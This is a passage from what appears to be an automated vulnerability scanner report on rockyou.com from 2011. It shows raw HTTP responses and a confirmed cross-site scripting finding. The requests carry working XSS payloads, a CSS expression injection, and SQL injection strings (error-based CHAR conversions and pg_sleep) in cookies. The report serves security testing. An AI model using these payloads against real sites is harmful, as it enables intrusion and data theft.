slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<link href="css/browse.css" rel="stylesheet" type="text/css">
<div class="header">
<div style="float:left; font-family:Arial, Helvetica, sans-serif; font-size:16px;">
<a href="/choose_widget.php">Create</a> |
<a href="/my_stuff.php">My Stuff</a> |
<a href="/featuredartists.php">Browse</a>
</div>
<div style="text-align:right; font-size:9pt; font-family:Arial, Helvetica, sans-serif">
<a href="http://www.rockyou.com/login/">Get a RockYou Account</a> | <a href="/login.php">Sign in Here</a> </div>
<div id="header_banner" style="margin-top:3px; margin-bottom:5px; width:100%; clear:both">
<table width="100%"><tr>
<td width="104px"><a href="/"><img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" alt="RockYou.com"></a></td>
<td align="right" style="vertical-align:top">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #ff6d07"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</td>
</tr></table>
</div>
</div><div class="body">
<div class="musicheader"></div>
<div class="musicbody">
<!-- Music Slideshows -->
<div class="musicobject" style="margin-left:0px"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/zac_brown.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a> </div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117375614"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/tila_tequila.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=114684110"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/rissy_palmer.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=105684192"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/krista.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div style="clear:both"></div>
</div>
<div class="musicfooter"></div>
<link href="browse/browse.css" rel="stylesheet" type="text/css">
<div class="tabmenu">
<div class="tabinactive" style="margin-left:0px"><a href="featuredartists.php">Featured Artists</a></div>
<div class="tabinactive"><a href="categorylist.php">Categories</a></div>
<div class="tabactive">Tag Search</div>
</div>
<div style="clear:both"></div>
<div class="mainheader"></div>
<div class="mainbody">
<!-- Tag Search -->
<h1>Tags</h1>
<form>
<input name="s_tsearch" style="position:relative;top:-9px" type=text value="' stYle=x:expre/**/ssion(netsparker(9)) ns='">
<input type="submit" value="Submit" style="position:absolute;width:66px;height:29px;-moz-opacity:0;filter:alpha(opacity:0);opacity:0;"/><img src="http://apps.rockyou.com/images/button-search.jpg" />
</form>
<br />
<h1>Popular Tags</h1>
<a href='viewsearch.php?s_tsearch=angels'>angels</a> <a href='viewsearch.php?s_tsearch=miami'>miami</a> <a href='viewsearch.php?s_tsearch=park'>park</a> <a href='viewsearch.php?s_tsearch=blue'>blue</a> <a href='viewsearch.php?s_tsearch=beautiful'>beautiful</a> <a href='viewsearch.php?s_tsearch=concert'>concert</a> <a href='viewsearch.php?s_tsearch=metal'>metal</a> <a href='viewsearch.php?s_tsearch=things'>things</a> <a href='viewsearch.php?s_tsearch=star'>star</a> <a href='viewsearch.php?s_tsearch=basketball'>basketball</a> <a href='viewsearch.php?s_tsearch=children'>children</a> <a href='viewsearch.php?s_tsearch=hottie'>hottie</a> <a href='viewsearch.php?s_tsearch=only'>only</a> <a href='viewsearch.php?s_tsearch=florida'>florida</a> <a href='viewsearch.php?s_tsearch=smile'>smile</a> <a href='viewsearch.php?s_tsearch=college'>college</a> <a href='viewsearch.php?s_tsearch=tattoos'>tattoos</a> <a href='viewsearch.php?s_tsearch=anime'>anime</a> <a href='viewsearch.php?s_tsearch=jessica'>jessica</a> <a href='viewsearch.php?s_tsearch=high'>high</a> <a href='viewsearch.php?s_tsearch=school'>school</a> <a href='viewsearch.php?s_tsearch=back'>back</a> <a href='viewsearch.php?s_tsearch=tribute'>tribute</a> <a href='viewsearch.php?s_tsearch=event'>event</a> <a href='viewsearch.php?s_tsearch=beer'>beer</a> <a href='viewsearch.php?s_tsearch=camping'>camping</a> <a href='viewsearch.php?s_tsearch=festival'>festival</a> <a href='viewsearch.php?s_tsearch=disneyland'>disneyland</a> <a href='viewsearch.php?s_tsearch=chris'>chris</a> <a href='viewsearch.php?s_tsearch=myspace'>myspace</a> <a href='viewsearch.php?s_tsearch=daughter'>daughter</a> <a href='viewsearch.php?s_tsearch=cruise'>cruise</a> <a href='viewsearch.php?s_tsearch=movies'>movies</a> <a href='viewsearch.php?s_tsearch=clubs'>clubs</a> <a href='viewsearch.php?s_tsearch=fish'>fish</a> <a href='viewsearch.php?s_tsearch=heros'>heros</a> <a href='viewsearch.php?s_tsearch=celebrity'>celebrity</a> <a href='viewsearch.php?s_tsearch=rabbit'>rabbit</a> <a href='viewsearch.php?s_tsearch=will'>will</a> <a href='viewsearch.php?s_tsearch=animals'>animals</a> <a href='viewsearch.php?s_tsearch=disney'>disney</a> <a href='viewsearch.php?s_tsearch=world'>world</a> <a href='viewsearch.php?s_tsearch=pink'>pink</a> <a href='viewsearch.php?s_tsearch=forever'>forever</a> <a href='viewsearch.php?s_tsearch=vegas'>vegas</a> <a href='viewsearch.php?s_tsearch=faces'>faces</a> <a href='viewsearch.php?s_tsearch=music'>music</a> <a href='viewsearch.php?s_tsearch=b day'>b day</a> <a href='viewsearch.php?s_tsearch=prom'>prom</a> <a href='viewsearch.php?s_tsearch=drawing'>drawing</a> <a href='viewsearch.php?s_tsearch=women'>women</a> <a href='viewsearch.php?s_tsearch=military'>military</a> <a href='viewsearch.php?s_tsearch=adventures'>adventures</a> <a href='viewsearch.php?s_tsearch=halloween'>halloween</a> <a href='viewsearch.php?s_tsearch=your'>your</a> <a href='viewsearch.php?s_tsearch=dance'>dance</a> <a href='viewsearch.php?s_tsearch=fall'>fall</a> <a href='viewsearch.php?s_tsearch=homecoming'>homecoming</a> <a href='viewsearch.php?s_tsearch=weekend'>weekend</a> <a href='viewsearch.php?s_tsearch=race'>race</a> <a href='viewsearch.php?s_tsearch=dogs'>dogs</a> <a href='viewsearch.php?s_tsearch=white'>white</a> <a href='viewsearch.php?s_tsearch=california'>california</a> <a href='viewsearch.php?s_tsearch=york'>york</a> <a href='viewsearch.php?s_tsearch=ashley'>ashley</a> <a href='viewsearch.php?s_tsearch=cars'>cars</a> <a href='viewsearch.php?s_tsearch=pets'>pets</a> <a href='viewsearch.php?s_tsearch=hair'>hair</a> <a href='viewsearch.php?s_tsearch=band'>band</a> <a href='viewsearch.php?s_tsearch=sister'>sister</a> <a href='viewsearch.php?s_tsearch=football'>football</a> <a href='viewsearch.php?s_tsearch=fire'>fire</a> <a href='viewsearch.php?s_tsearch=honeymoon'>honeymoon</a> <a href='viewsearch.php?s_tsearch=mexico'>mexico</a> <a href='viewsearch.php?s_tsearch=senior'>senior</a> <a href='viewsearch.php?s_tsearch=paris'>paris</a> <a href='viewsearch.php?s_tsearch=sports'>sports</a> <a href='viewsearch.php?s_tsearch=wildness'>wildness</a> <a href='viewsearch.php?s_tsearch=hawaii'>hawaii</a> <a href='viewsearch.php?s_tsearch=princess'>prin..
Date: Mon, 18 Apr 2011 22:59:31 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:59:30 GMT; path=/; domain=.rockyou.com,lastlogin=1303167571; expires=Wed, 27-Jul-2011 22:59:31 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:59:31 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=18017 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 5469
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<link href="css/browse.css" rel="stylesheet" type="text/css">
<div class="header">
<div style="float:left; font-family:Arial, Helvetica, sans-serif; font-size:16px;">
<a href="/choose_widget.php">Create</a> |
<a href="/my_stuff.php">My Stuff</a> |
<a href="/featuredartists.php">Browse</a>
</div>
<div style="text-align:right; font-size:9pt; font-family:Arial, Helvetica, sans-serif">
<a href="http://www.rockyou.com/login/">Get a RockYou Account</a> | <a href="/login.php">Sign in Here</a> </div>
<div id="header_banner" style="margin-top:3px; margin-bottom:5px; width:100%; clear:both">
<table width="100%"><tr>
<td width="104px"><a href="/"><img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" alt="RockYou.com"></a></td>
<td align="right" style="vertical-align:top">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #ff6d07"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</td>
</tr></table>
</div>
</div><div class="body">
<div class="musicheader"></div>
<div class="musicbody">
<!-- Music Slideshows -->
<div class="musicobject" style="margin-left:0px"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/zac_brown.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a> </div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117375614"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/tila_tequila.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=114684110"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/rissy_palmer.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div class="musicobject"><a href="http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=105684192"><img src="http://cdn.rockyou.com/rockyou.com/browse/music_header_info/krista.jpg" /><br /><img src="http://cdn.rockyou.com/rockyou.com/browse/button.jpg" width="150" height="55" /></a></div>
<div style="clear:both"></div>
</div>
<div class="musicfooter"></div>
<link href="browse/browse.css" rel="stylesheet" type="text/css">
<div class="tabmenu">
<div class="tabinactive" style="margin-left:0px"><a href="featuredartists.php">Featured Artists</a></div>
<div class="tabinactive"><a href="categorylist.php">Categories</a></div>
<div class="tabactive">Tag Search</div>
</div>
<div style="clear:both"></div>
<div class="mainheader"></div>
<div class="mainbody">
<!-- Tag Search -->
<h1>Tags</h1>
<form>
<input name="s_tsearch" style="position:relative;top:-9px" type=text value="' stYle=x:expre/**/ssion(netsparker(9)) ns='">
<input type="submit" value="Submit" style="position:absolute;width:66px;height:29px;-moz-opacity:0;filter:alpha(opacity:0);opacity:0;"/><img src="http://apps.rockyou.com/images/button-search.jpg" />
</form>
<br />
<h1>Popular Tags</h1>
<a href='viewsearch.php?s_tsearch=angels'>angels</a> <a href='viewsearch.php?s_tsearch=miami'>miami</a> <a href='viewsearch.php?s_tsearch=park'>park</a> <a href='viewsearch.php?s_tsearch=blue'>blue</a> <a href='viewsearch.php?s_tsearch=beautiful'>beautiful</a> <a href='viewsearch.php?s_tsearch=concert'>concert</a> <a href='viewsearch.php?s_tsearch=metal'>metal</a> <a href='viewsearch.php?s_tsearch=things'>things</a> <a href='viewsearch.php?s_tsearch=star'>star</a> <a href='viewsearch.php?s_tsearch=basketball'>basketball</a> <a href='viewsearch.php?s_tsearch=children'>children</a> <a href='viewsearch.php?s_tsearch=hottie'>hottie</a> <a href='viewsearch.php?s_tsearch=only'>only</a> <a href='viewsearch.php?s_tsearch=florida'>florida</a> <a href='viewsearch.php?s_tsearch=smile'>smile</a> <a href='viewsearch.php?s_tsearch=college'>college</a> <a href='viewsearch.php?s_tsearch=tattoos'>tattoos</a> <a href='viewsearch.php?s_tsearch=anime'>anime</a> <a href='viewsearch.php?s_tsearch=jessica'>jessica</a> <a href='viewsearch.php?s_tsearch=high'>high</a> <a href='viewsearch.php?s_tsearch=school'>school</a> <a href='viewsearch.php?s_tsearch=back'>back</a> <a href='viewsearch.php?s_tsearch=tribute'>tribute</a> <a href='viewsearch.php?s_tsearch=event'>event</a> <a href='viewsearch.php?s_tsearch=beer'>beer</a> <a href='viewsearch.php?s_tsearch=camping'>camping</a> <a href='viewsearch.php?s_tsearch=festival'>festival</a> <a href='viewsearch.php?s_tsearch=disneyland'>disneyland</a> <a href='viewsearch.php?s_tsearch=chris'>chris</a> <a href='viewsearch.php?s_tsearch=myspace'>myspace</a> <a href='viewsearch.php?s_tsearch=daughter'>daughter</a> <a href='viewsearch.php?s_tsearch=cruise'>cruise</a> <a href='viewsearch.php?s_tsearch=movies'>movies</a> <a href='viewsearch.php?s_tsearch=clubs'>clubs</a> <a href='viewsearch.php?s_tsearch=fish'>fish</a> <a href='viewsearch.php?s_tsearch=heros'>heros</a> <a href='viewsearch.php?s_tsearch=celebrity'>celebrity</a> <a href='viewsearch.php?s_tsearch=rabbit'>rabbit</a> <a href='viewsearch.php?s_tsearch=will'>will</a> <a href='viewsearch.php?s_tsearch=animals'>animals</a> <a href='viewsearch.php?s_tsearch=disney'>disney</a> <a href='viewsearch.php?s_tsearch=world'>world</a> <a href='viewsearch.php?s_tsearch=pink'>pink</a> <a href='viewsearch.php?s_tsearch=forever'>forever</a> <a href='viewsearch.php?s_tsearch=vegas'>vegas</a> <a href='viewsearch.php?s_tsearch=faces'>faces</a> <a href='viewsearch.php?s_tsearch=music'>music</a> <a href='viewsearch.php?s_tsearch=b day'>b day</a> <a href='viewsearch.php?s_tsearch=prom'>prom</a> <a href='viewsearch.php?s_tsearch=drawing'>drawing</a> <a href='viewsearch.php?s_tsearch=women'>women</a> <a href='viewsearch.php?s_tsearch=military'>military</a> <a href='viewsearch.php?s_tsearch=adventures'>adventures</a> <a href='viewsearch.php?s_tsearch=halloween'>halloween</a> <a href='viewsearch.php?s_tsearch=your'>your</a> <a href='viewsearch.php?s_tsearch=dance'>dance</a> <a href='viewsearch.php?s_tsearch=fall'>fall</a> <a href='viewsearch.php?s_tsearch=homecoming'>homecoming</a> <a href='viewsearch.php?s_tsearch=weekend'>weekend</a> <a href='viewsearch.php?s_tsearch=race'>race</a> <a href='viewsearch.php?s_tsearch=dogs'>dogs</a> <a href='viewsearch.php?s_tsearch=white'>white</a> <a href='viewsearch.php?s_tsearch=california'>california</a> <a href='viewsearch.php?s_tsearch=york'>york</a> <a href='viewsearch.php?s_tsearch=ashley'>ashley</a> <a href='viewsearch.php?s_tsearch=cars'>cars</a> <a href='viewsearch.php?s_tsearch=pets'>pets</a> <a href='viewsearch.php?s_tsearch=hair'>hair</a> <a href='viewsearch.php?s_tsearch=band'>band</a> <a href='viewsearch.php?s_tsearch=sister'>sister</a> <a href='viewsearch.php?s_tsearch=football'>football</a> <a href='viewsearch.php?s_tsearch=fire'>fire</a> <a href='viewsearch.php?s_tsearch=honeymoon'>honeymoon</a> <a href='viewsearch.php?s_tsearch=mexico'>mexico</a> <a href='viewsearch.php?s_tsearch=senior'>senior</a> <a href='viewsearch.php?s_tsearch=paris'>paris</a> <a href='viewsearch.php?s_tsearch=sports'>sports</a> <a href='viewsearch.php?s_tsearch=wildness'>wildness</a> <a href='viewsearch.php?s_tsearch=hawaii'>hawaii</a> <a href='viewsearch.php?s_tsearch=princess'>prin..
|
- /slideshow-create.php
/slideshow-create.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| refid | GET | 3 |
| create | GET | 1 |
| instanceid | GET | '"--></style></script><script>alert(0x0025FA)</script> |
Request
GET /slideshow-create.php?refid=3&create=1&instanceid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025FA)%3C/script%3E HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167603; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167603; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:00:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:00:02 GMT; path=/; domain=.rockyou.com,lastlogin=1303167603; expires=Wed, 27-Jul-2011 23:00:03 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 23:00:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=23713 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26959
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
